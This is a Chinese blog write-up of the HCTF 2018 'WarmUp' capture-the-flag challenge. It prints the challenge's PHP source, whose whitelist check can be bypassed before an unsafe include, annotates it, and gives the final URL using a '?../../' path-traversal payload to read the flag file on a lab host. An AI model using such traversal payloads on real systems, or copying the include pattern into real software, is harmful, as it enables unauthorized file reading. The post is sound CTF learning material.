[HCTF 2018]WarmUp 1

于 2023-11-22 15:23:23 发布
阅读量64 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: android 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/TID12/article/details/134553431

题目一进来就是一张图片(本人是小白只是来做一下笔记的,还请大佬指点)
在这里插入图片描述
这道题是一个代码审计的题目,所以直接先看源码
在这里插入图片描述
可以看到源码非常的简短,可能有用的地方就只有绿色的source.php其他都是常规的HTML,尝试将其复制到url后进行打开
在这里插入图片描述
访问后果然得到了一段源码

<?php
    highlight_file(__FILE__);
    class emmm
    {
        public static function checkFile(&$page)
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it";
                return false;
            }

            if (in_array($page, $whitelist)) {
                return true;
            }

            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }

            $_page = urldecode($page);
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }

    if (! empty($_REQUEST['file'])
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }  
?>

可以看到白名单,whitelist里面只有source,和hint.php,于是再次尝试更改url访问
在这里插入图片描述
访问后得到了这个,他说flag不在这里,而在ffffllllaaaagggg这个东西中,我们这几次访问的都是/文件名.php所以猜测ffffllllaaaagggg是一个文件,通过目录层层查找将其找到。
现在的问题就是这个文件叫什么
再看代码解析(本人只是小白,还没学过php,凭着自己的理解和问chat gpt才写出来的解析,错了还请大佬指点)

<?php
    highlight_file(__FILE__);
    class emmm//先去看主函数,再来看类
    {
        public static function checkFile(&$page)
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];//这里定义了一个白名单,只能是source和hint才能访问
            if (! isset($page) || !is_string($page)) { //首先先检查传进来的参数page是否为字符串,否则返回flase
                echo "you can't see it";
                return false;
            }

            if (in_array($page, $whitelist)) {//再检查是否再白名单中,如果在就返回true
                return true;
            }

            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')//是先将一个?添加到字符串的末尾,这样确保能够在这个字符串中找到?,然后再去查找第一次出现?的位置,将其截下来,重新赋值给page
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }//检查前面截断的page是否在白色名单中,这就要求了我们输入的文件名前要带上source.php?

            $_page = urldecode($page);//这里是进行url的编码
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')//还是提取?前的部分
            );
            if (in_array($_page, $whitelist)) {//检测是否在白名单中
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }
//首先是一个主函数,对输入的文件名进行判断,如果符合了三个if的条件才会查找出那个文件
    if (! empty($_REQUEST['file'])
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])//这里的三个条件分别是输入的文件名不为空并且是字符串,并且还要满足checkFile这个类的这个函数判断所返回的结果,所以我们继续去看类里面
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }  //否则就会弹出一开始的那个图片
?>

因此我们要在前面输入白名单.php?再去找文件的位置,一层层利用…/查找就可以找到最终的层数
http://601a3a11-94e9-4d20-892e-1714498a42dc.node4.buuoj.cn:81/?file=source.php?../…/…/…/…/ffffllllaaaagggg
最后获得flag

在这里插入图片描述

TID12
关注
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值